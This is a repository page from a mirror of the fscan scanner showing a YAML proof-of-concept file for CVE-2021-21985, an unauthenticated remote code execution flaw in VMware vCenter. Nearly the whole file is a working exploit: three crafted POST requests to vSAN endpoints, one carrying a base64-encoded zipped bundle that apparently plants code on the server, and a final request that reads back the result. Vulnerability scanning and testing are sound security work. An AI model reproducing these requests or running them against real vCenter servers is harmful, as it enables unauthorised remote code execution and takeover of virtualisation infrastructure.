mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-09-14 14:06:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity
v2.2.1
fscan/webscan/pocs/vmware-vcenter-cve-2021-21985-rce.yml
ZacharyZcR c2b63a57e2 refactor: 修正包命名规范并修复编译问题 
- 重命名 Common -> common,WebScan -> webscan,遵循 Go 包命名约定
- 修复模块路径大小写不匹配导致的编译错误
- 清理依赖项,优化 go.mod 文件
- 添加 Docker 测试环境配置文件
- 新增镜像拉取脚本以处理网络超时问题
- 成功编译生成 fscan v2.2.1 可执行文件

该修复解决了 Linux 系统下包名大小写敏感导致的模块解析失败问题。
2025-09-01 22:41:54 +00:00

34 lines
2.2 KiB
YAML
Raw Permalink Blame History

name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
rules:
- method: POST
path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
headers:
Content-Type: application/json
body: |
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
expression: |
response.status == 200 && response.body.bcontains(b"{\"result\":{\"") && response.headers["set-Cookie"].contains("VSPHERE-UI-JSESSIONID")
- method: POST
path: /ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages
headers:
Content-Type: application/json
body: |
{"methodInput": [["https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,UEsDBBQAAAAIADihc1Okxc3arAEAAI8EAAASAAAAb2ZmbGluZV9idW5kbGUueG1spVNNT+MwFLxX4j+YIFWNRG0+biWJBOxlJVZC2z0gIQ6O+5qYdeysn9MUIf77unGBfoFUyCXOezMvM2M7yYFrJPNKaUyj0rl6xFjbthRrK3UxtbyC1ti/1NiCoSih4qyjRAc9Ep6OO5qjXOO35x3l7OTklN39uhl31KHU6LgWsMJGOQpzb4zgThqdvjb3ULMPlgXAsPugc5xEWfhhsqgQOUmjOo+IUBx9JI98xqniuqC31ghAvGqkmoB9JXVEYbwv2whn7JDbYqXlm0qiW6v42oyrBjKWS81yjmXCQmEnaig+bSeH99c/Lv9c3pO2NLyS5Czrn5KHh2wXK2EbahK2W3vSZbUVjMT1YKShP3XduLGzwKvfwPdJ5s3C0XOdU38wrBvEtAC3MnIQv2z72FN0brdEXzXTKViYfF2xxO8LE0YpWEA3Um2cVD6PhX96/Y7JPhiDT+ig2nFix6GxKrC2pgbrnoj21yON2pI7mPkESGcljY6eSRhHEdztEjzo/2uMuzCN8/sS1sckt1RJDei3bOlj8O6HPhqp/SVbMg964R3HMXmJ2GYqYYF+9R9QSwECFAAUAAAACAA4oXNTpMXN2qwBAACPBAAAEgAAAAAAAAAAAAAAtoEAAAAAb2ZmbGluZV9idW5kbGUueG1sUEsFBgAAAAABAAEAQAAAANwBAAAAAA==%23"]]}
expression: |
response.status == 200
- method: POST
path: /ui/h5-vsan/rest/proxy/service/systemProperties/getProperty
headers:
Content-Type: application/json
body: |
{"methodInput": ["output", null]}
expression: |
response.status == 200 && response.body.bcontains(b"{\"result\":") && !response.body.bcontains(b"null")
detail:
vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
author: envone77
description: "vmware vCenter unauth RCE cve-2021-21985"
links:
- https://www.anquanke.com/post/id/243098
- https://github.com/alt3kx/CVE-2021-21985_PoC
Reference in New Issue View Git Blame Copy Permalink